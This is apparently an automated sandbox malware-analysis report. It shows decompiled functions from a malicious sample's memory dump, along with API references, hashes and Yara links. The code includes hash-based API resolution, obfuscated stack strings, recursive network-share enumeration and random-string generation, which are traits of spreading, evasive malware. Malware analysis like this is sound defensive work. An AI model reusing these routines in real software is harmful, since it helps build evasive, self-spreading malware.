Instruction Fuzzy Hash: E7A1E0B0504701DFD754CF19C484B46BBE0BB48328F25856EE81A8B392D3BAE959CFD5

Uniqueness

Uniqueness Score: 1.47%

Function 00425A57, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00425A57(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t13;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x44de98 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x43e130 + _t22 * 4);
						_t13 = LoadLibraryExW(_t23, 0, 0x800); // executed
						_t32 = _t13;
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E0042E6C6(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E0042E6C6(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x00425a60
0x00425b0a
0x00425a68
0x00425a6a
0x00425a71
0x00425a73
0x00425a79
0x00425a86
0x00425a95
0x00425a9b
0x00425a9f
0x00425af1
0x00425af1
0x00425af6
0x00425afa
0x00425afd
0x00425afd
0x00425b03
0x00425b05
0x00425b1c
0x00425b15
0x00425b1b
0x00425b1b
0x00425b07
0x00425b07
0x00000000
0x00425b07
0x00425aa1
0x00425aaa
0x00425ae1
0x00425ae1
0x00425ae3
0x00425ae5
0x00000000
0x00000000
0x00425aed
0x00000000
0x00425aed
0x00425ab4
0x00425ab9
0x00425abe
0x00000000
0x00000000
0x00425ac8
0x00425acd
0x00425ad2
0x00000000
0x00000000
0x00425ad7
0x00425add
0x00000000
0x00425add
0x00425a7e
0x00000000
0x00000000
0x00000000
0x00425a84
0x00425b13
0x00000000

APIs

LoadLibraryExW.KERNELBASE(?,00000000,00000800,0041370C,00000000,?,4A5CC10F,?,00425B62,?,?,00000000,0041370C,?,?,00425DB1), ref: 00425A95
GetLastError.KERNEL32(?,00425B62,?,?,00000000,0041370C,?,?,00425DB1,00000006,FlsSetValue,0043E5F8,0043E600,00000000,?,00425341), ref: 00425AA1
LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,?,?,0041370C), ref: 00425AD7
FreeLibrary.KERNEL32(00000000,?,00425B62,?,?,00000000,0041370C,?,?,00425DB1,00000006,FlsSetValue,0043E5F8,0043E600,00000000), ref: 00425AFD

Strings

ext-ms-, xrefs: 00425AC2
api-ms-, xrefs: 00425AAE

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: Library$Load$ErrorFreeLast
String ID: api-ms-$ext-ms-
API String ID: 3813093105-537541572
Opcode ID: f4b64f67717c447c1903e6e61ddd7bee166b4557a0e9dd52f0255bc216a1b7d8
Instruction ID: e78ec2a52412fc58c9f64a7e788c4a5cd4fcb0124779d8123792873f8b3d94f0
Opcode Fuzzy Hash: f4b64f67717c447c1903e6e61ddd7bee166b4557a0e9dd52f0255bc216a1b7d8
Instruction Fuzzy Hash: 5121F332B45A30ABCF318A25ACC5B1B7B589B11760FA40222FC05A7390D638ED01C5E9

Uniqueness

Uniqueness Score: 0.28%

Function 00408277, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 64
memorystringUNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E00408277(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _t12;
				void* _t19;
				WCHAR* _t29;
				void* _t32;

				if( *0x419878 != 0) {
					_v8 = _v8 & 0x00000000;
					_t29 = E00408E03(_a4,  &_v8);
					if(_v8 != 0) {
						_t12 = VirtualAlloc(0, 4 + lstrlenW(_t29) * 2, 0x3000, 4); // executed
						_t32 = _t12;
						if(_t32 != 0) {
							wsprintfW(_t32, L"%ws ", _t29);
							_t19 = 0;
							if(E0040C552( *0x419878, _t32) != 0 || E00401AC8(_t29,  *0x4198a0) == 0) {
								_t19 = 1;
							}
							VirtualFree(_t32, 0, 0x8000); // executed
							_t12 = _t19;
						}
					} else {
						_t12 = 0;
					}
					return _t12;
				}
				return 0;
			}

0x00408282
0x0040828b
0x004082a0
0x004082a4
0x004082c3
0x004082c9
0x004082cd
0x004082d7
0x004082e4
0x004082f0
0x00408306
0x00408306
0x0040830f
0x00408315
0x00408317
0x004082a6
0x004082a6
0x004082a6
0x00000000
0x00408319
0x00000000

APIs

Part of subcall function 00408E03: lstrlenW.KERNEL32(00408106,00000010,?,0040829C,00408106,00000000,00000000,?,?,00408106), ref: 00408E0B

lstrlenW.KERNEL32(00000000,00003000,00000004,00000010,00000000,?,?,00408106), ref: 004082B3
VirtualAlloc.KERNELBASE(00000000,00000000,?,?,00408106), ref: 004082C3
wsprintfW.USER32 ref: 004082D7
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0040830F

Strings

p<A, xrefs: 0040827B
%ws , xrefs: 004082D1

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: Virtuallstrlen$AllocFreewsprintf
String ID: %ws $p<A
API String ID: 3114517310-3095745877
Opcode ID: c7c685b1bc3dbd762c8e4de24a61013cc0abad9e12c7cd8137cbae2191ac068f
Instruction ID: b76b2ddb5019895c7f5268f2bea1ad117a38d02870528195e1bfa94665463a9b
Opcode Fuzzy Hash: c7c685b1bc3dbd762c8e4de24a61013cc0abad9e12c7cd8137cbae2191ac068f
Instruction Fuzzy Hash: 35110C31611214BFEB105BA1AD85FAB7B9CEB85B69F10403FFA02E01E0DF799D41869D

Uniqueness

Uniqueness Score: 100.00%

Function 00404066, Relevance: 9.3, APIs: 3, Strings: 3, Instructions: 261
stringUNIQUE

Download Yara Rule

C-Code - Quality: 70%

			E00404066(intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				char _v128;
				short _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				char _v200;
				short _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				char _v276;
				intOrPtr _v280;
				WCHAR* _v284;
				char* _v288;
				intOrPtr _v292;
				intOrPtr* _v296;
				void* __ebx;
				char* _t107;
				intOrPtr* _t108;
				char _t110;
				intOrPtr _t112;
				WCHAR* _t115;
				intOrPtr* _t118;
				signed int _t120;
				char _t121;
				intOrPtr* _t124;
				void* _t128;
				intOrPtr _t130;
				intOrPtr* _t131;
				intOrPtr* _t133;
				intOrPtr* _t136;
				signed int _t138;
				intOrPtr _t140;
				intOrPtr* _t141;
				int _t143;
				intOrPtr* _t144;
				char* _t149;
				intOrPtr* _t150;
				WCHAR* _t154;
				char* _t155;
				WCHAR* _t161;
				void* _t162;
				char* _t170;
				void* _t171;
				char* _t172;
				intOrPtr* _t175;
				char* _t177;
				char* _t182;
				WCHAR* _t184;
				short* _t185;
				WCHAR* _t186;
				WCHAR* _t187;
				WCHAR* _t188;
				WCHAR* _t189;
				intOrPtr* _t190;
				WCHAR* _t192;
				void* _t198;

				_t147 = 0;
				_t198 =  *0x419874 - _t147; // 0x6660000
				if(_t198 == 0) {
					_v276 = 0x6c8a492c;
					_v272 = 0xd53d1978;
					_v268 = 0x3e1a04eb;
					_v264 = 0xa855382;
					_v260 = 0xc89188e;
					_v256 = 0xc8918bc;
					_v252 = 0x1a99b43f;
					_v248 = 0x165fe1d9;
					_v244 = 0xb5ae27fb;
					_v240 = 0x7bbda57f;
					_v236 = 0x3f61306;
					_v232 = 0x6689e465;
					_v228 = 0x8ce60c8d;
					_v224 = 0xff7519a;
					_v220 = 0x7e6a0cce;
					_v216 = 0xdb88d917;
					_v212 = 0x3a92d672;
					_v208 = 0xa280842f;
					_v204 = 0x2c2d;
					_v280 = E00407563( &_v276);
					_v200 = 0x82068482;
					_v196 = 0x66c56bef;
					_v192 = 0x397f9b91;
					_v188 = 0xfd86684e;
					_v184 = 0x6b371290;
					_v180 = 0x6b3712be;
					_v176 = 0x9c382e18;
					_v172 = 0x22f1c88;
					_v168 = 0x812daeb3;
					_v164 = 0x332139b2;
					_v160 = 0x443c520d;
					_v156 = 0x8be318a0;
					_v152 = 0x3821b26b;
					_v148 = 0x28a02387;
					_v144 = 0x8a6933f;
					_v140 = 0xc645654d;
					_v136 = 0xc95ff9;
					_v132 = 0xc4b;
					_v284 = E00407563( &_v200);
					_t107 = E0040143B(_a4,  *_a4 + 0x204); // executed
					_t182 = _t107;
					_v288 = _t182;
					_t108 = E0040143B( *0x41988c,  *0x419894); // executed
					_t175 = _t108;
					_v296 = _t175;
					if(_t182 != 0) {
						if(_t175 != 0) {
							_t170 = _t182;
							_t45 =  &(_t170[1]); // 0x1
							_t149 = _t45;
							do {
								_t110 =  *_t170;
								_t170 =  &(_t170[1]);
							} while (_t110 != 0);
							_t171 = _t170 - _t149;
							_t150 = _t175;
							_t46 = _t150 + 1; // 0x1
							_v292 = _t46;
							do {
								_t112 =  *_t150;
								_t150 = _t150 + 1;
							} while (_t112 != 0);
							_t115 = E0040C6BA(0x100 + (_t150 - _v292 + _t171) * 2); // executed
							 *0x419874 = _t115;
							if(_t115 != 0) {
								E00401AAD(_t115, _v280);
								_t184 =  *0x419874; // 0x6660000
								_t118 = E004010BB(0, 1, 0x2ca1b5f0);
								 *_t118(_t184, 0x411140);
								_t120 = lstrlenW( *0x419874);
								_t154 =  *0x419874; // 0x6660000
								_t172 = _v288;
								_t185 =  &(_t154[_t120]);
								_t155 = _t172;
								_t177 =  &(_t155[1]);
								do {
									_t121 =  *_t155;
									_t155 =  &(_t155[1]);
								} while (_t121 != 0);
								MultiByteToWideChar(0, 0, _t172, 0xffffffff, _t185, _t155 - _t177 + 1);
								_t186 =  *0x419874; // 0x6660000
								_t124 = E004010BB(0, 1, 0x2ca1b5f0);
								 *_t124(_t186, 0x411140);
								E00401A92( *0x419874, _v284);
								_v128 = 0x4f20dc3e;
								_v124 = 0xec86e46e;
								_v120 = 0xfc5df27;
								_v116 = 0x92504995;
								_v112 = 0x2d339857;
								_v108 = 0x2d33987f;
								_v104 = 0xd649528c;
								_v100 = 0x3d113284;
								_v96 = 0x11c75e84;
								_v92 = 0x3e1b1503;
								_v88 = 0x3885bbfc;
								_v84 = 0xfe6b64c4;
								_v80 = 0x42505bcb;
								_v76 = 0xa35e3392;
								_v72 = 0xd021419e;
								_v68 = 0x3ba68b56;
								_t128 = E00407563( &_v128);
								_v64 = 0xc2394991;
								_v60 = 0xbeecb617;
								_v56 = 0x924b5d65;
								_v52 = 0xd086a87f;
								_v48 = 0xbd30204c;
								_v44 = 0xbd302068;
								_v40 = 0xe5449db6;
								_v36 = 0xa765a6a7;
								_v32 = 0xb0dde510;
								_v28 = 0x6de07840;
								_v24 = 0x34d0ae81;
								_v20 = 0x32cdb711;
								_v16 = 0xfaf62497;
								_v12 = 0x19265bc1;
								_v8 = 0xb6c4942e;
								_t130 = E00407563( &_v64);
								_t187 =  *0x419874; // 0x6660000
								_v280 = _t130;
								_t131 = E004010BB(0, 1, 0x2ca1b5f0);
								 *_t131(_t187, 0x411140);
								_t188 =  *0x419874; // 0x6660000
								_t133 = E004010BB(0, 1, 0x2ca1b5f0);
								 *_t133(_t188, 0x411140);
								E00401A92( *0x419874, _t128);
								_t189 =  *0x419874; // 0x6660000
								_t136 = E004010BB(0, 1, 0x2ca1b5f0);
								 *_t136(_t189, 0x411140);
								_t138 = lstrlenW( *0x419874);
								_t161 =  *0x419874; // 0x6660000
								_t175 = _v296;
								_t190 = _t175;
								_v284 =  &(_t161[_t138]);
								_t162 = _t190 + 1;
								do {
									_t140 =  *_t190;
									_t190 = _t190 + 1;
								} while (_t140 != 0);
								_t141 = E004010BB(0, 1, 0x5aa7e70b);
								_t143 =  *_t141(0, 0, _t175, 0xffffffff, _v284, _t190 - _t162 + 1);
								_t192 =  *0x419874; // 0x6660000
								_t147 = _t143;
								_t144 = E004010BB(_t147, 1, 0x2ca1b5f0);
								 *_t144(_t192, 0x411140);
								E00401A92( *0x419874, _v280);
								_t182 = _v288;
							}
							E0040C6D1(_t175); // executed
						}
						E0040C6D1(_t182); // executed
					}
				}
				return _t147;
			}

0x00404070
0x00404072
0x00404078
0x0040408a
0x00404094
0x004040a6
0x004040b0
0x004040ba
0x004040c4
0x004040ce
0x004040d8
0x004040e2
0x004040ec
0x004040f6
0x00404100
0x0040410a
0x00404114
0x0040411e
0x00404128
0x00404132
0x0040413c
0x00404146
0x00404154
0x00404161
0x0040416b
0x00404175
0x0040417f
0x00404189
0x00404193
0x0040419d
0x004041a7
0x004041b1
0x004041bb
0x004041c5
0x004041cf
0x004041d9
0x004041e3
0x004041ed
0x004041f7
0x00404201
0x0040420b
0x00404218
0x0040421e
0x00404229
0x00404231
0x00404237
0x0040423f
0x00404241
0x00404249
0x00404251
0x00404257
0x00404259
0x00404259
0x0040425c
0x0040425c
0x0040425e
0x0040425f
0x00404263
0x00404265
0x00404267
0x0040426a
0x00404270
0x00404270
0x00404272
0x00404273
0x00404288
0x0040428d
0x00404295
0x004042a2
0x004042a7
0x004042b4
0x004042c2
0x004042ca
0x004042d0
0x004042d6
0x004042dc
0x004042df
0x004042e1
0x004042e4
0x004042e4
0x004042e6
0x004042e7
0x004042f7
0x004042fd
0x0040430a
0x00404317
0x00404325
0x0040432d
0x00404335
0x0040433c
0x00404343
0x0040434a
0x00404351
0x00404358
0x0040435f
0x00404366
0x0040436d
0x00404374
0x0040437b
0x00404382
0x00404389
0x00404390
0x00404397
0x0040439e
0x004043a5
0x004043af
0x004043b7
0x004043be
0x004043c5
0x004043cc
0x004043d3
0x004043da
0x004043e1
0x004043e8
0x004043ef
0x004043f6
0x004043fd
0x00404404
0x0040440b
0x00404412
0x00404417
0x00404424
0x0040442a
0x00404438
0x0040443a
0x00404447
0x00404454
0x0040445d
0x00404462
0x0040446f
0x0040447d
0x00404485
0x0040448b
0x00404491
0x00404497
0x0040449c
0x004044a2
0x004044a5
0x004044a5
0x004044a7
0x004044a8
0x004044b5
0x004044cd
0x004044cf
0x004044d5
0x004044de
0x004044eb
0x004044f9
0x004044fe
0x00404505
0x00404507
0x0040450c
0x0040450e
0x00404513
0x00404515
0x0040451c

APIs

Part of subcall function 0040143B: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0040149A

Part of subcall function 0040C6BA: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00403FBE,00000202), ref: 0040C6C9

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,00008000), ref: 004042CA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,06660000,?,?,?,?,?,?,?,?,?,?,00008000), ref: 004042F7
lstrlenW.KERNEL32 ref: 00404485

Part of subcall function 0040C6D1: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00408010,00000000,?,?,00408ACF,?,00000000,00000000,00000000), ref: 0040C6DE

Strings

R<D, xrefs: 004041C5
@xm, xrefs: 004043E8
-,, xrefs: 00404146

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: Virtual$Alloclstrlen$ByteCharFreeLibraryLoadMultiWide
String ID: R<D$-,$@xm
API String ID: 3027541504-1015722679
Opcode ID: 8291d134232d37a9701bb5d9dd9ed30d0f9064fd2ee464e8e08a76b21661d5af
Instruction ID: e75e0d29f921e1a6cc05a353a27c4bd40e41606cb6db190b3fdb1ae2b581991d
Opcode Fuzzy Hash: 8291d134232d37a9701bb5d9dd9ed30d0f9064fd2ee464e8e08a76b21661d5af
Instruction Fuzzy Hash: 3BC1ACB1C002289FDB24AFA6DD41BDDBB71FB05304F1482AEE6097B251DB355A85CF98

Uniqueness

Uniqueness Score: 100.00%

Function 00404C2E, Relevance: 9.1, APIs: 6, Instructions: 149
sharememoryUNIQUE

Download Yara Rule

C-Code - Quality: 88%

			E00404C2E(struct _NETRESOURCE* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v8;
				int _v12;
				void* _v16;
				void* __ebx;
				void* _t45;
				int _t47;
				int _t51;
				int _t57;
				int _t59;
				void* _t64;
				void* _t85;
				void* _t86;
				void* _t87;
				int _t88;
				intOrPtr* _t90;
				intOrPtr* _t92;
				void* _t93;

				_v16 = _v16 & 0x00000000;
				_t45 = VirtualAlloc(0, 0x1002, 0x3000, 4); // executed
				_v12 = _v12 & 0x00000000;
				_t64 = _t45;
				_v8 = _v8 & 0x00000000;
				_t85 = 0x28997d49;
				if(_a4 == 0) {
					E004010BB(_t64, 0xa, 0x174538d9); // executed
					_t57 = WNetOpenEnumW(3, 1, 0, 0,  &_v16); // executed
					if(_t57 == 0) {
						while(1) {
							_v12 = 0x1000;
							_v8 = 0x80;
							E004010BB(_t64, 0xa, _t85);
							_t59 = WNetEnumResourceW(_v16,  &_v8, _t64,  &_v12); // executed
							if(_t59 != 0) {
								break;
							}
							_t87 = 0;
							if(_v8 > 0) {
								_t10 = _t64 + 0x14; // 0x14
								_t92 = _t10;
								do {
									if( *((intOrPtr*)(_t92 - 0x10)) == 1) {
										E00404F4F( *_t92, _a12); // executed
									}
									if(( *(_t92 - 8) & 0x00000002) != 0) {
										_t17 = _t92 - 0x14; // 0x0
										E00404C2E(_t17, _a8, _a12);
										_t93 = _t93 + 0xc;
									}
									_t87 = _t87 + 1;
									_t92 = _t92 + 0x20;
								} while (_t87 < _v8);
							}
							_t85 = 0x28997d49;
						}
						E00401B2B(_v16);
					}
				}
				E004010BB(_t64, 0xa, 0x174538d9);
				_t47 = WNetOpenEnumW(2, 1, 0, _a4,  &_v16); // executed
				_t88 = _t47;
				if(_t88 == 0) {
					_push(_t85);
					while(1) {
						_push(0xa);
						_v12 = 0x1000;
						_v8 = 0x80;
						E004010BB(_t64);
						_t51 = WNetEnumResourceW(_v16,  &_v8, _t64,  &_v12); // executed
						if(_t51 != 0) {
							break;
						}
						_t86 = 0;
						if(_v8 > 0) {
							_t29 = _t64 + 0x14; // 0x14
							_t90 = _t29;
							do {
								if( *((intOrPtr*)(_t90 - 0x10)) == 1) {
									E00404F4F( *_t90, _a12);
								}
								if(( *(_t90 - 8) & 0x00000002) != 0) {
									_t36 = _t90 - 0x14; // 0x0
									E00404C2E(_t36, _a8, _a12); // executed
									_t93 = _t93 + 0xc;
								}
								_t86 = _t86 + 1;
								_t90 = _t90 + 0x20;
							} while (_t86 < _v8);
						}
						_push(0x28997d49);
					}
					_t88 = E00401B2B(_v16);
				}
				VirtualFree(_t64, 0, 0x8000); // executed
				return _t88;
			}

0x00404c34
0x00404c49
0x00404c4f
0x00404c53
0x00404c55
0x00404c59
0x00404c62
0x00404c6f
0x00404c82
0x00404c86
0x00404ccc
0x00404cd2
0x00404cd9
0x00404ce0
0x00404cf1
0x00404cf5
0x00000000
0x00000000
0x00404c8a
0x00404c8f
0x00404c91
0x00404c91
0x00404c94
0x00404c98
0x00404c9f
0x00404ca5
0x00404caa
0x00404caf
0x00404cb6
0x00404cbb
0x00404cbb
0x00404cbe
0x00404cbf
0x00404cc2
0x00404c94
0x00404cc7
0x00404cc7
0x00404cfa
0x00404cff
0x00404c86
0x00404d07
0x00404d1b
0x00404d1d
0x00404d21
0x00404d23
0x00404d68
0x00404d6b
0x00404d6d
0x00404d74
0x00404d7b
0x00404d8c
0x00404d90
0x00000000
0x00000000
0x00404d26
0x00404d2b
0x00404d2d
0x00404d2d
0x00404d30
0x00404d34
0x00404d3b
0x00404d41
0x00404d46
0x00404d4b
0x00404d52
0x00404d57
0x00404d57
0x00404d5a
0x00404d5b
0x00404d5e
0x00404d30
0x00404d63
0x00404d63
0x00404d9b
0x00404d9b
0x00404da5
0x00404db3

APIs

VirtualAlloc.KERNELBASE(00000000,00001002,00003000,00000004,00000000,?), ref: 00404C49

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

WNetOpenEnumW.MPR(00000002,00000001,00000000,00000000,00000000), ref: 00404D1B

Part of subcall function 00404F4F: wsprintfW.USER32 ref: 00404F6D

Part of subcall function 00404C2E: WNetOpenEnumW.MPR(00000003,00000001,00000000,00000000,00000000), ref: 00404C82
Part of subcall function 00404C2E: WNetEnumResourceW.MPR(00000000,00000080,00000000,00001000), ref: 00404CF1

WNetEnumResourceW.MPR(00000000,00000080,00000000,00001000), ref: 00404D8C
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00404DA5

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: Enum$OpenResourceVirtual$AllocFreeLibraryLoadwsprintf
String ID:
API String ID: 582159002-0
Opcode ID: 5bfbc6045bd4b2d415494d910a4362e3a6367b4d94763a8f9465a75a128237a9
Instruction ID: 1cc17310bbcbea06be6c2dfe623087f0b664dd0c1555fa14a2f8b18d445656de
Opcode Fuzzy Hash: 5bfbc6045bd4b2d415494d910a4362e3a6367b4d94763a8f9465a75a128237a9
Instruction Fuzzy Hash: 5F41E172900205BBEB269FD1DC46BEE77B5EF84714F20406AF6013A1C0DBB96A448B58

Uniqueness

Uniqueness Score: 100.00%

Function 0040C1AC, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 118
libraryloaderUNIQUE

Download Yara Rule

C-Code - Quality: 58%

			E0040C1AC(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v30;
				short _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v60;
				void* __ebx;
				intOrPtr* _t42;
				void* _t43;
				struct HINSTANCE__* _t50;
				_Unknown_base(*)()* _t51;
				intOrPtr* _t52;
				intOrPtr* _t60;
				intOrPtr _t66;
				signed int _t70;
				signed int _t77;
				signed int _t81;
				intOrPtr _t84;
				void* _t86;
				void* _t89;

				_t64 = 0;
				_t42 = E004010BB(0, 5, 0x8ad7de22);
				_t43 =  *_t42( &_v8, 0, 0, 1, 0xf0000000); // executed
				if(_t43 == 0) {
					L14:
					return _t64;
				}
				_t81 = 0x1a;
				_t70 = 0;
				_v12 = _t81;
				do {
					_t3 = _t70 + 0x61; // 0x61
					 *((short*)(_t89 + _t70 * 2 - 0x70)) = _t3;
					_t70 = _t70 + 1;
				} while (_t70 < _t81);
				_t84 = _a8;
				_t10 = _t84 + _t84 + 1; // 0x1
				E00405C38( &_v60, _t10); // executed
				_t86 = E00405C7D( &_v60, _t84 + _t84);
				if(_t86 != 0) {
					_v44 = 0x70797243;
					_v40 = 0x6e654774;
					_v36 = 0x646e6152;
					_v32 = 0x6d6f;
					_v30 = 0;
					_v28 = 0x61766441;
					_v24 = 0x32336970;
					_v20 = 0x6c6c642e;
					_v16 = 0;
					_t50 = GetModuleHandleA( &_v28);
					if(_t50 != 0) {
						L7:
						_t25 =  &_v44; // 0x70797243
						_t51 = GetProcAddress(_t50, _t25);
						if(_t51 == 0) {
							L13:
							_t52 = E004010BB(_t64, 5, 0x72760bb8);
							 *_t52(_v8, 0);
							E00405C6C( &_v60);
							goto L14;
						}
						_push(_t86);
						_push(_t84);
						_push(_v8);
						if( *_t51() == 0) {
							goto L13;
						}
						_t77 = 0;
						if(_t84 == 0) {
							L12:
							_t64 = 1;
							goto L13;
						}
						_t66 = _a4;
						do {
							 *((short*)(_t66 + _t77 * 2)) =  *((intOrPtr*)(_t89 + ( *(_t77 + _t86) & 0x000000ff) % _v12 * 2 - 0x70));
							_t77 = _t77 + 1;
						} while (_t77 < _t84);
						goto L12;
					}
					_t24 =  &_v28; // 0x61766441
					_t50 = LoadLibraryA(_t24);
					if(_t50 == 0) {
						goto L13;
					}
					goto L7;
				}
				_t60 = E004010BB(0, 5, 0x72760bb8);
				 *_t60(_v8, 0);
				E00405C6C( &_v60);
				return 0;
			}

0x0040c1bc
0x0040c1be
0x0040c1d2
0x0040c1d6
0x0040c2e4
0x00000000
0x0040c2e4
0x0040c1de
0x0040c1df
0x0040c1e1
0x0040c1e4
0x0040c1e4
0x0040c1e7
0x0040c1ec
0x0040c1ed
0x0040c1f1
0x0040c1fa
0x0040c1fe
0x0040c20c
0x0040c210
0x0040c23a
0x0040c242
0x0040c249
0x0040c250
0x0040c256
0x0040c259
0x0040c260
0x0040c267
0x0040c26e
0x0040c271
0x0040c279
0x0040c289
0x0040c289
0x0040c28e
0x0040c296
0x0040c2c6
0x0040c2d0
0x0040c2da
0x0040c2df
0x00000000
0x0040c2df
0x0040c298
0x0040c299
0x0040c29a
0x0040c2a1
0x00000000
0x00000000
0x0040c2a3
0x0040c2a7
0x0040c2c3
0x0040c2c5
0x00000000
0x0040c2c5
0x0040c2a9
0x0040c2ac
0x0040c2ba
0x0040c2be
0x0040c2bf
0x00000000
0x0040c2ac
0x0040c27b
0x0040c27f
0x0040c287
0x00000000
0x00000000
0x00000000
0x0040c287
0x0040c21c
0x0040c226
0x0040c22b
0x00000000

APIs

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

Part of subcall function 00405C38: VirtualAlloc.KERNELBASE(00000000,0040C0AD,00003000,00000040,00000000,?,?,0040C0AD,?,?,?,?,?,?,?,0040165A), ref: 00405C55

GetModuleHandleA.KERNEL32(?,00000000,00000001,?,00000000,00000000), ref: 0040C271
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0040C27F
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll,?,00000000,00000000), ref: 0040C28E

Part of subcall function 00405C6C: VirtualFree.KERNELBASE(?,00000000,00008000,0040C1A3,?,?,?,?,?,?,0040165A,00000000,00000020,00000001,00000000), ref: 00405C76

Strings

CryptGenRandomAdvapi32.dll, xrefs: 0040C289, 0040C28C
Advapi32.dll, xrefs: 0040C27B, 0040C27E

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

